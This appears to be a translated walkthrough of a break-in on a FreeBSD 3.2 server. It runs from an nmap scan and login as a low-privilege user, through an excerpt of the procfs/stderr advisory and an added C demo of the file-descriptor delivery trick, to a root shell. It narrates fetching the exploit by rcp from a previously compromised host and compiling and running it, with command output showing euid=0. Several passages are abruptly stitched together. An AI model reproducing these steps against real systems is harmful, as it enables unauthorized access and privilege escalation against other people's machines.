Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on www.targe.com (111.111.111.111):
Port    State       Protocol  Service
7       open        tcp       echo
9       open        tcp       discard
19      open        tcp       chargen
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
79      open        tcp       finger
80      open        tcp       http
111     open        tcp       sunrpc
443     open        tcp       https
512     open        tcp       exec
513     open        tcp       login
514     open        tcp       shell
515     open        tcp       printer
540     open        tcp       uucp
3306    open        tcp       MySQL
TCP Sequence Prediction: Class=random positive increments
                         Difficulty=55346 (Worthy challenge)
No OS matches for host (If you know what OS is running on it …………
…………
Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds
21      open        tcp       ftp
25      open        tcp       smtp
79      open        tcp       finger
80      open        tcp       http
111     open        tcp       sunrpc
512     open        tcp       exec
513     open        tcp       login
514     open        tcp       shell
540     open        tcp       uucp
3306    open        tcp       mysql
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
head to /http/1.0 not supported.<P>
Invalid method in request head /http/1.0<P>
<HR>
<ADDRESS>Apache/1.3.9 Server at ***-***-***-*** Port 80</ADDRESS>
</BODY></HTML>
Last login: Fri Mar 24 19:04:50 from 202.102.2.147
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
        The Regents of the University of California.  All rights reserved.

FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999

You have mail.
Heh, so it's FreeBSD 3.2-RELEASE. Not bad. I'm in; let's see what privileges I have...
> id
uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
Looks like what I can do is still pretty limited... First let's check whether anyone else is on the system...
> w
 9:03PM  up 6 days,  2:37, 3 users, load averages: 0.00, 0.01, 0.00
USER     TTY  FROM              LOGIN@  IDLE WHAT
ccc      p0   **.**.***.***     6:04PM  2:41 -tcsh (tcsh)
In order to stop this exploit, an additional check was added to the code responsible for I/O on file descriptors referring to procfs pseudofiles. In miscfs/procfs/procfs.h (from FreeBSD 3.0) we read:

    /*
     * Check to see whether access to target process is allowed
     * Evaluates to 1 if access is allowed.
     */
    #define CHECKIO(p1, p2) \
         ((((p1)->p_cred->pc_ucred->cr_uid == (p2)->p_cred->p_ruid) && \
           ((p1)->p_cred->p_ruid == (p2)->p_cred->p_ruid) && \
           ((p1)->p_cred->p_svuid == (p2)->p_cred->p_ruid) && \
           ((p2)->p_flag & P_SUGID) == 0) || \
          (suser((p1)->p_cred->pc_ucred, &(p1)->p_acflag) == 0))

As we see, the process performing I/O (p1) must have the same uids as the target process (p2), unless... p1 has root privileges. So, if we can trick a setuid program X into writing to a file descriptor F referring to a procfs object, the above check will not prevent X from writing. As some readers certainly have already guessed, F's number will be 2, the stderr fileno... We can pass to a setuid program an appropriately lseeked file descriptor no. 2 (pointing to some /proc/pid/mem), and this program will blindly write its error messages there. Such output is often partially controllable (e.g. it contains the program's name), so we can write almost arbitrary data into another setuid program's memory.
exploits, but in fact differs profoundly. It exploits the fact that the properties of a fd pointing into procfs are not determined fully by the "open" syscall (all other fds are; skipping issues related to securelevels). These properties can change because of privileged code execution. As a result, (privileged) children of some process P can inherit a fd opened read-write, though P can't directly obtain such a fd via the open syscall.
Too lazy to put that into Chinese... read it if you're interested, otherwise just skip it...
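To make the two halves of the advisory concrete, here is an added example (my own demo code, not the advisory's or the exploit's). The CHECKIO rule is rewritten as a plain function over a toy credential struct, and the delivery step is reproduced against a regular file in /tmp that stands in for /proc/pid/mem: fd 2 is pointed at it, lseeked to an attacker-chosen offset, and a child that only prints an error message lands its bytes exactly there. The uids (attacker 1003, victim setuid root), the file path and the use of /bin/sh are assumptions for the demo; no procfs or setuid binary is touched.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Toy stand-in for the struct proc / struct pcred fields that CHECKIO reads. */
struct toy_proc {
    unsigned cr_uid;   /* effective uid (pc_ucred->cr_uid) */
    unsigned p_ruid;   /* real uid */
    unsigned p_svuid;  /* saved uid */
    int      p_sugid;  /* P_SUGID: ids changed, e.g. by a setuid exec */
};

/* Same rule as the CHECKIO(p1, p2) macro: 1 if p1 may do I/O on p2's procfs
 * files. The final clause models suser(): any caller with euid 0 passes,
 * whatever its real and saved uids. That is the hole the advisory describes. */
int checkio(const struct toy_proc *p1, const struct toy_proc *p2)
{
    return (p1->cr_uid == p2->p_ruid && p1->p_ruid == p2->p_ruid &&
            p1->p_svuid == p2->p_ruid && p2->p_sugid == 0) ||
           p1->cr_uid == 0;
}

/* Create `path` holding `size` filler bytes; it plays the victim's
 * /proc/pid/mem in this demo. Returns 1 on success. */
int make_target(const char *path, size_t size)
{
    char filler[8192];
    int fd, ok;
    if (size > sizeof filler) return 0;
    fd = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return 0;
    memset(filler, 'A', size);
    ok = write(fd, filler, size) == (ssize_t)size;
    close(fd);
    return ok;
}

/* The delivery step: open the target read-write, lseek to `off`, install the
 * descriptor as fd 2 and exec a child that only prints an error message. The
 * child never looks at what fd 2 is; the shared file offset puts its stderr
 * output at `off`. Returns 1 if the message landed exactly there. */
int deliver_via_stderr(const char *path, off_t off, const char *msg)
{
    char buf[256];
    size_t n = strlen(msg);
    int fd, rfd, status, ok;
    pid_t pid;

    if (n == 0 || n >= sizeof buf) return 0;
    if ((fd = open(path, O_RDWR)) < 0) return 0;
    if (lseek(fd, off, SEEK_SET) != off || (pid = fork()) < 0) { close(fd); return 0; }
    if (pid == 0) {
        dup2(fd, STDERR_FILENO);
        close(fd);
        /* $0 is the message; the child merely "complains" on stderr. */
        execl("/bin/sh", "sh", "-c", "printf '%s' \"$0\" >&2", msg, (char *)NULL);
        _exit(127);
    }
    close(fd);
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status) || WEXITSTATUS(status))
        return 0;

    /* Read back exactly the window the parent positioned fd 2 at. */
    if ((rfd = open(path, O_RDONLY)) < 0) return 0;
    ok = lseek(rfd, off, SEEK_SET) == off && read(rfd, buf, n) == (ssize_t)n &&
         memcmp(buf, msg, n) == 0;
    close(rfd);
    return ok;
}

/* Whole scenario with assumed uids: attacker is uid 1003 as on the page, the
 * victim is a setuid-root process (P_SUGID set). Returns 1 when the attacker
 * is refused by CHECKIO, a setuid-root child it spawned is allowed, and an
 * inherited fd 2 lands a message at offset 4096 of the stand-in target. */
int run_demo(void)
{
    struct toy_proc victim     = { 0, 0, 0, 1 };
    struct toy_proc attacker   = { 1003, 1003, 1003, 0 };
    struct toy_proc suid_child = { 0, 1003, 0, 1 };     /* euid 0, ruid 1003 */
    char path[64];
    int ok;

    snprintf(path, sizeof path, "/tmp/procfs_demo_%ld", (long)getpid());
    ok = checkio(&attacker, &victim) == 0 && checkio(&suid_child, &victim) == 1 &&
         make_target(path, 8192) &&
         deliver_via_stderr(path, 4096, "p: No such file or directory\n");
    unlink(path);
    return ok;
}

int main(void)
{
    puts(run_demo() ? "stderr output landed at the chosen offset" : "demo failed");
    return 0;
}
```

The point to notice is that the child is completely ordinary: it calls nothing but a write on fd 2, yet the parent decided both the object and the offset. In the real case the parent cannot open /proc/pid/mem read-write itself (CHECKIO refuses a uid-1003 caller), but a setuid-root child it execs passes the suser() clause, so the write goes through.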
OK, so let's rcp the exploit program over.
> rcp root@***.***.***.**:/tmp/pcnfs.c /tmp/
Here ***.***.***.** is an earlier unlucky victim, a box that had "+ +" added under /...
Compile and run; you may have to make a few small changes to the program...
> gcc pcnfs.c -o p
> ./p -4000 -10000
shellcode addr=0xbfbfcd4c stack=0xbfbfaddc
Wait for "Press return" prompt:
New passWord:
Press return.
> id
uid=1003(ccc) gid=1003(ccc) euid=0(root) groups=1003(ccc)